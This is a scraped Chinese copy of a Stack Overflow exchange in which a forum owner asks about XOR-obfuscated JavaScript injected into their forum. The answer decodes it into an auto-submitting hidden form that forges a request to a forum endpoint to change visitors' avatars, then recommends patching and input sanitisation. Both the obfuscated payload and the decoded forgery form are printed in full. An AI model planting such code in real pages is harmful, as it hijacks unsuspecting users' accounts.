gpt4 book ai didi

Javascript编码?

转载 作者:行者123 更新时间:2023-12-02 17:29:03 25 4
gpt4 key购买 nike

有人使用奇怪的脚本来破坏我的论坛,我跟踪它并找到了 javascript,但它是“编码的”,有人可以帮助我吗?

这里是:

<script language="javascript">
var enkripsi="'1A`mf{'02mlNmcf'1F'00qw`okv]dmpo'0:'0;'1@'00'1G'2C'1Admpo'02lcog'1F'00o{dmpo'00'02cavkml'1F'00jvvr'1C--dmpwo,hmemq,wmn,amo,`p-fup-gzga-WqgpDwlavkmlq,wrfcvgWqgpCtcvcp,fup'00'02ogvjmf'1F'00RMQV'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00acnnAmwlv'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/qapkrvLcog'00'02tcnwg'1F'00WqgpDwlavkmlq'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/ogvjmfLcog'00'02tcnwg'1F'00wrfcvgWqgpCtcvcp'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/kf'00'02tcnwg'1F'007:55]3135040515351'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72;;'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'00'02tcnwg'1F'00vpwg'00'1G'2C'02'02Rngcqg'02ankai'02jgpg'1C'02'1Aklrwv'02v{rg'1F'00qw`okv'00'02tcnwg'1F'00Amlvklwg,,,'00'02-'1G'1A-r'1G'2C'1A-dmpo'1G'2C'2C'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'1G'2C'02'02'1A'03//'2C'02'02dwlavkml'02qw`okv]dmpo'0:'0;'02'2C'02'02'5@'2C'02'2;fmawoglv,o{dmpo,qw`okv'0:'0;'2C'02'02'5F'2C'02'02//'1G'2C'1A-qapkrv'1G"; teks=""; teksasli="";var panjang;panjang=enkripsi.length;for (i=0;i<panjang;i++){ teks+=String.fromCharCode(enkripsi.charCodeAt(i)^2) }teksasli=unescape(teks);document.write(teksasli);
</script>

最佳答案

清理代码结果

var enkripsi = "'1A`mf{'02mlNmcf'1F'00qw`okv]dmpo'0:'0;'1@'00'1G'2C'1Admpo'02lcog'1F'00o{dmpo'00'02cavkml'1F'00jvvr'1C--dmpwo,hmemq,wmn,amo,`p-fup-gzga-WqgpDwlavkmlq,wrfcvgWqgpCtcvcp,fup'00'02ogvjmf'1F'00RMQV'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00acnnAmwlv'00'02tcnwg'1F'003'00'1G'02'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/qapkrvLcog'00'02tcnwg'1F'00WqgpDwlavkmlq'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/ogvjmfLcog'00'02tcnwg'1F'00wrfcvgWqgpCtcvcp'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/kf'00'02tcnwg'1F'007:55]3135040515351'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00a2/rcpco2'00'02tcnwg'1F'00qvpkle'1C72;;'00'1G'2C'02'02'1Aklrwv'02v{rg'1F'00jkffgl'00'02lcog'1F'00zon'00'02tcnwg'1F'00vpwg'00'1G'2C'02'02Rngcqg'02ankai'02jgpg'1C'02'1Aklrwv'02v{rg'1F'00qw`okv'00'02tcnwg'1F'00Amlvklwg,,,'00'02-'1G'1A-r'1G'2C'1A-dmpo'1G'2C'2C'1Aqapkrv'02nclewceg'1F'00hctcqapkrv'00'1G'2C'02'02'1A'03//'2C'02'02dwlavkml'02qw`okv]dmpo'0:'0;'02'2C'02'02'5@'2C'02'2;fmawoglv,o{dmpo,qw`okv'0:'0;'2C'02'02'5F'2C'02'02//'1G'2C'1A-qapkrv'1G";
teks = "";
teksasli = "";
var panjang;
panjang = enkripsi.length;
for (i = 0; i < panjang; i++) {
teks += String.fromCharCode(enkripsi.charCodeAt(i) ^ 2)
}
teksasli = unescape(teks);
document.write(teksasli);

document.write 更改为 console.log。将其放入 firebug 中即可。

<body onLoad="submit_form();">
<form name="myform" action="http://forum.jogos.uol.com.br/dwr/exec/UserFunctions.updateUserAvatar.dwr" method="POST">
<input type="hidden" name="callCount" value="1">
<input type="hidden" name="c0-scriptName" value="UserFunctions">
<input type="hidden" name="c0-methodName" value="updateUserAvatar">
<input type="hidden" name="c0-id" value="5877_1317262737173">
<input type="hidden" name="c0-param0" value="string:5099">
<input type="hidden" name="xml" value="true">
Please click here: <input type="submit" value="Continue..." />
</p>
</form>
<script language="javascript">
<!-- function submit_form() { document.myform.submit() } -->
</script>

这里真正的问题是用户如何将代码注入(inject)到您的站点中。他们是将其输入到表单中,而您只是输出他们输入的任何内容,还是您使用的软件存在错误?

如果是软件中的错误,则升级。

如果这是您的代码,您需要学习如何净化用户输入。 OWASP has great info

关于Javascript编码?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/7592370/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com